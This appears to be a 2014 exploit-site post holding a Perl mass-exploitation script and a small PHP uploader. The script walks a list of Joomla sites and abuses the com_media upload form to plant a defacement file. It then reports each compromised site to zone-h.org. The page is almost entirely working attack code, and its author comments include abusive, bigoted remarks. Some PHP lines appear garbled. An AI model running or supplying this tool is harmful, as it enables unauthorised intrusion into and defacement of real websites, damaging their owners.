facebook facebook twitter rss

com_media auto exploiter [Perl/PHP]

Author: CrashBandicot , Published: 25-07-2014

use LWP::UserAgent;

use Term::ANSIColor;
use Win32::Console::ANSI;
 
  # Download Direct : http://www.mediafire.com/download/afa6rb6907a6ztf/media_exploiter.rar
  # Video : https://www.youtube.com/watch?v=dBMW9q4rxdw
 
                   # CoDed CrashBandicot
                   # Gr33tz M-A , m0sta & all staff of exploit4arab
                   # Fuck All Haters , ALL leechers , Lamers , zionist , Nationalist
                   # FUck ALL noob Copying my script , respect coder please
                   # if you use the .txt for deface change Keyword line 51 by your keywords
                   # Using 2 method for recolt the url for the request post
                   # Result in mediaResult.txt , don't rename file up.php
 
if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
 
print color("bold green") ,"\n\n\t                com_media Auto Exploiter\n";
print "\t           Usage : perl $0 list.txt owned.txt \n\n";
print color 'reset';
open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
 
$name = $ARGV[1];
 
$zeeb = $target."index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
$fucki = $ua->get($zeeb);
$kzz = $fucki->content;
if($kzz =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $kzz =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
{
        print color("green"), "\n\n [+] com_media found -> $target"; print color 'reset'; sleep(1);
 
$url = $1;
$url =~ s/&amp;/&/gi;
 
} else { print "\n\n [+] com_media not found -> $target"; sleep(1);}
 
$fili = $target."images\/$name";
 
system("php up.php $url $name");
$ual = LWP::UserAgent->new;
$ual->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
$trl = $ual->get($fili);
if($trl->content =~ /by TeaM MosTa/) {
print color("bold green"),"\n\n [+] Owned -> $fili"; print color 'reset';
 
                                $lwp = LWP::UserAgent->new;
                                $res= $lwp->post("http://zone-h.org/notify/single",[
                                'defacer'     => 'TeaM MosTa',
                                'domain1'   => $fili,
                                'hackmode' => '15',
                                'reason'       => '1',
                                'submit'       => 'Send',
                                ]);
                                if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
                                print "\n      [+] Submit zone-h $1 "; sleep(1);
                                }
                                else
                                {
                                print "\n      [+] Submit zone-h ERROR"; sleep(1);
                                }
 
open(fuck ,">>mediaResult.txt");
print fuck "$fili\n";
close fuck;
 
}
else { print color("red"), "\n\n [+] Not Defaced $target"; print color 'reset'; sleep(1); }
 
}
 
 
###################################################################################################
# File name : up.php
 
 
 
<?php
$url 
$argv[1];
$uploadfile $argv[2];
$ch curl_init($url);
curl_setopt($chCURLOPT_COOKIESESSIONtrue);
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
 
array(
'Filedata[]'=>"@$uploadfile"));
 
curl_setopt($chCURLOPT_RETURNTRANSFER1);
 
$postResult curl_exec($ch);
 
curl_close($ch);
 
?>

Like us on Facebook :